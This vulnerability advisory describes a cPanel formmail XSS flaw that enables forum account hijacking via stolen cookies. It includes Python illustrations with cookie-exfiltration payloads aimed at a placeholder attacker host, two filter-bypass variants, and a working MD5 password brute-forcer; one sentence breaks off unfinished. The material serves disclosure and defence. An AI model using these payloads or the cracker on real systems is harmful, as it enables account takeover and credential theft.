Discussion boards/forums (and other similarly coded applications) located on
hosting accounts set up using Cpanel version "5.3.0-RELEASE #117" and below
(other versions have not been tested) are vulnerable to standard cross-site
scripting (XSS, written "CSS" in the original report) attacks due to poor
filtering in the copy of Matt Wright's popular formmail.cgi script that Cpanel
bundles. The same XSS problem, believed at the time to be specific to Matt
Wright's formmail, was posted to Bugtraq on 11/02/03.
Rootsecure.net recently verified this attack against a Cpanel host running
both the bundled Invision Board 1.0.1 and a custom-installed 1.1a. It should
be noted that this is no fault of Invision's product: as with most other web
applications, cookies are assumed to be private and unknown to outside parties,
and it is difficult to implement additional verification that would prevent
this attack from succeeding.
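As an added illustration of the bug class the advisory describes (this is not formmail.cgi's code and not Rootsecure.net's attack), the following Python sketch shows a form handler echoing a submitted field back into its HTML response three ways: unfiltered, through a naive blocklist filter, and through proper output encoding. The payloads and the attacker host name in them are constructed placeholders, and the "poor filtering" shown is a generic blocklist, not a claim about what formmail.cgi actually did.

```python
import html
import re

# Constructed sample payloads. "attacker.invalid" is a reserved placeholder name.
COOKIE_THEFT_PAYLOAD = (
    '<script>document.location="http://attacker.invalid/log?c="'
    '+encodeURIComponent(document.cookie)</script>'
)
# Two classic bypasses of a literal "<script>" blocklist: changed case, and a
# tag nested inside itself so that a single removal pass reassembles it.
CASE_BYPASS = (
    "<SCRIPT>document.location='http://attacker.invalid/log?c='"
    "+document.cookie</SCRIPT>"
)
NESTED_BYPASS = (
    "<scr<script>ipt>document.location='http://attacker.invalid/log?c='"
    "+document.cookie</script>"
)

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_unfiltered(field: str) -> str:
    """Echo the submitted field straight into the HTML body: the bug class."""
    return f"<html><body>Thank you, {field}. Your message was sent.</body></html>"


def render_blocklisted(field: str) -> str:
    """Strip the literal tag strings only. Case changes and nesting get through."""
    cleaned = field.replace("<script>", "").replace("</script>", "")
    return f"<html><body>Thank you, {cleaned}. Your message was sent.</body></html>"


def render_escaped(field: str) -> str:
    """Encode for the HTML text context so the browser shows the bytes as text."""
    safe = html.escape(field, quote=True)
    return f"<html><body>Thank you, {safe}. Your message was sent.</body></html>"


def reflects_script(page: str) -> bool:
    """True if the response still contains an active <script> tag."""
    return SCRIPT_TAG.search(page) is not None


def compare_filters(field: str) -> dict:
    """Which rendering strategies leave this field executable in the response."""
    return {
        "unfiltered": reflects_script(render_unfiltered(field)),
        "blocklisted": reflects_script(render_blocklisted(field)),
        "escaped": reflects_script(render_escaped(field)),
    }


if __name__ == "__main__":
    samples = [
        ("plain", COOKIE_THEFT_PAYLOAD),
        ("case", CASE_BYPASS),
        ("nested", NESTED_BYPASS),
    ]
    for name, payload in samples:
        print(name, compare_filters(payload))
```

The escaped variant is the correct fix for a value placed in HTML text. The blocklist catches only the plain payload; both bypasses survive it, which is what "poor filtering" usually means in practice. On the cookie side, the HttpOnly cookie attribute (supported from Internet Explorer 6 SP1) keeps an autologin cookie out of document.cookie even when a script does run, which addresses the "cookies are assumed private" point directly, though it does not stop the script from acting on the user's behalf within the page.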
If successfully exploited, an attacker gains full control over the user's
account, and if that user has moderator status, so does the attacker. At this
point administrative access cannot be gained, because the admin module uses an
additional, separate session-based authentication system. However, if the
attack is carried out against a user with administrative access rights, the
attacker may try brute forcing that user's MD5 password hash (6 or fewer
characters takes an hour or so on a reasonably specced machine; anything
bigger and you're looking at days) with a utility such as
Mitigating circumstances for the targeted user:
* Must have autologon enabled
* Has to visit a page set up by the attacker (unless the board has HTML
enabled)
* Most likely must be using Internet Explorer 6.0, due to its lax processing
of JavaScript code which does not adhere to standards
* Must have JavaScript turned on (configurations other than the default have
not been tested)
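The brute-force step mentioned above, as an added example (not the utility the advisory refers to, and not Rootsecure.net's code): a minimal Python MD5 brute forcer over a chosen character set and maximum length, together with a search-space calculation so the hour-versus-days claim can be checked against whatever hash rate your own machine achieves. The target hash is constructed here from a known short string, and the unsalted hex-MD5 storage format is an assumption for the sake of the example.

```python
import hashlib
import itertools
import string
import time
from typing import Optional

LOWER_ALNUM = string.ascii_lowercase + string.digits   # 36 symbols
ALNUM = string.ascii_letters + string.digits           # 62 symbols


def md5_hex(text: str) -> str:
    """Hex MD5 digest of a string (assumed unsalted storage, as in the example)."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def search_space(charset_size: int, max_len: int) -> int:
    """Number of candidates of length 1..max_len over a charset of this size."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def estimate_hours(charset_size: int, max_len: int, hashes_per_second: float) -> float:
    """Worst-case wall-clock hours to exhaust the space at a measured hash rate."""
    return search_space(charset_size, max_len) / hashes_per_second / 3600.0


def brute_force_md5(target_hex: str, charset: str, max_len: int) -> Optional[str]:
    """Exhaust all strings of length 1..max_len over charset, shortest first.

    Returns the preimage, or None if nothing in the space matches.
    """
    target = target_hex.lower()
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hashlib.md5(candidate.encode("utf-8")).hexdigest() == target:
                return candidate
    return None


def measure_rate(seconds: float = 0.5) -> float:
    """Rough single-threaded hashes-per-second figure for this machine."""
    count = 0
    deadline = time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        hashlib.md5(b"benchmark")
        count += 1
    return count / seconds


if __name__ == "__main__":
    # Constructed target: the hash of a known short password, not a real user's.
    target = md5_hex("ab1")
    print("recovered:", brute_force_md5(target, LOWER_ALNUM, 3))
    rate = measure_rate()
    for n in (6, 7, 8):
        print(f"{n} chars over {len(ALNUM)} symbols: "
              f"{search_space(len(ALNUM), n):.3e} candidates, "
              f"~{estimate_hours(len(ALNUM), n, rate):.1f} h at {rate:.0f} H/s")
```

Each extra character multiplies the space by the charset size, which is why the advisory's estimate jumps from hours to days between 6 and 7 characters; the exact figures depend entirely on the hash rate, so measure rather than assume.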
Requirements for the attacker to implement the attack from scratch:
* An understanding of the HTTP protocol
* A server supporting a scripting language such as Perl
* Access to a LAN and knowledge of a packet sniffer such as Ethereal
(for gathering raw HTTP traffic to use as a template for the attack)
Note: This report is intentionally a brief outline of the process used
by Rootsecure.net to gain authorised access to an account for which it did
not know the password. More details may be forthcoming depending on
the availability/implementation of patches for this issue.
Cpanel, the vendor, was informed about this issue on 21/02/03 by Rootsecure.net.
Soon after, an email was received asking for specific details of the attack,
which were provided. Rootsecure.net now awaits a response to its query about
a patch for it.
Update: Cpanel are having difficulties reproducing the issue;
Rootsecure.net is providing assistance.
Thanks to Epiphany of
port7alliance.com for his assistance.